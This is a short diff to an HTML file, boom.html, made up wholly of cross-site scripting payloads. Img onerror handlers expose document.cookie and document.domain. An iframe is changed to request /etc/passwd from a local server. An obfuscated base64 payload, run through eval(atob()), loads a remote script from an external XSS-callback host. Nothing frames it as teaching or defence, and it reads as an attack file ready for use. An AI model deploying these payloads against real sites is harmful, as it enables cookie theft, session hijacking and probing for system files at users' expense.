--- a/boom.html
+++ b/boom.html
@@ -3,7 +3,7 @@
     <img src="x" onerror=prompt(document.cookie) />
     <img src="x" onerror=prompt(document.domain) />
 
-    <iframe src=http://localhost:4000></iframe>
+    <iframe src=http://localhost:4000/etc/passwd></iframe>
     "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2Jvb202NzAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
   </body>
 </html>
